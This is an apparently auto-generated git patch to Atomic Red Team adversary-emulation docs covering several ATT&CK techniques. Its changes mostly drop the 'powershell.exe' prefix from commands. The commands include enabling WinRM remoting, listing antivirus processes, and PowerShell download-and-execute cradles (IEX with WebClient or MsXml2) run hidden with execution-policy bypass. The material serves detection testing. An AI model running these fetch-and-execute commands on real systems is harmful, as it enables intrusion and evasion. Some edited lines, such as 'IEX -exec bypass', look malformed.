From c03d202bd5ad2f897aee0e2fa4e7fb4e3f58fe96 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 5 Sep 2018 15:35:37 +0000 Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=PowerShell-Executor.Command-Properties --- atomics/T1028/T1028.md | 2 +- atomics/T1033/T1033.md | 2 +- atomics/T1063/T1063.md | 8 ++++---- atomics/T1074/T1074.md | 2 +- atomics/T1086/T1086.md | 4 ++-- atomics/T1124/T1124.md | 2 +- 6 files changed, 10 insertions(+), 10 deletions(-) diff --git a/atomics/T1028/T1028.md b/atomics/T1028/T1028.md index 5c8c853bd2..f5c36f8c1a 100644 --- a/atomics/T1028/T1028.md +++ b/atomics/T1028/T1028.md @@ -37,7 +37,7 @@ Powershell Enable WinRM #### Run it with `powershell`! ``` -powershell Enable-PSRemoting -Force +Enable-PSRemoting -Force ```

diff --git a/atomics/T1033/T1033.md b/atomics/T1033/T1033.md index 3d8493a900..771f6fee3e 100644 --- a/atomics/T1033/T1033.md +++ b/atomics/T1033/T1033.md @@ -40,7 +40,7 @@ Identify System owner or users on an endpoint #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| computer_name | Name of remote computer | strong | computer1| +| computer_name | Name of remote computer | string | computer1| #### Run it with `command_prompt`! ``` diff --git a/atomics/T1063/T1063.md b/atomics/T1063/T1063.md index 3b10707388..06b131f550 100644 --- a/atomics/T1063/T1063.md +++ b/atomics/T1063/T1063.md @@ -57,10 +57,10 @@ Methods to identify Security Software on an endpoint #### Run it with `powershell`! ``` -powershell.exe get-process | ?{$_.Description -like "*virus*"} -powershell.exe get-process | ?{$_.Description -like "*carbonblack*"} -powershell.exe get-process | ?{$_.Description -like "*defender*"} -powershell.exe get-process | ?{$_.Description -like "*cylance*"} +get-process | ?{$_.Description -like "*virus*"} +get-process | ?{$_.Description -like "*carbonblack*"} +get-process | ?{$_.Description -like "*defender*"} +get-process | ?{$_.Description -like "*cylance*"} ```

diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md index f6f8183511..cd71c93a0a 100644 --- a/atomics/T1074/T1074.md +++ b/atomics/T1074/T1074.md @@ -27,6 +27,6 @@ Utilize powershell to download discovery.bat and save to a local file #### Run it with `powershell`! ``` -powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log +"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log ```
diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md index 649711dbc3..2f16632709 100644 --- a/atomics/T1086/T1086.md +++ b/atomics/T1086/T1086.md @@ -167,7 +167,7 @@ Not proxy aware removing cache although does not appear to write to those locati #### Run it with `powershell`! ``` -powershell.exe -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" +IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" ```

@@ -184,7 +184,7 @@ Powershell xml download request |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml| -#### Run it with `powershell`! +#### Run it with `command_prompt`! ``` "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX" ``` diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md index c4d7f6f6e9..57afaae400 100644 --- a/atomics/T1124/T1124.md +++ b/atomics/T1124/T1124.md @@ -48,6 +48,6 @@ Identify the system time via PowerShell #### Run it with `powershell`! ``` -powershell.exe Get-Date +Get-Date ```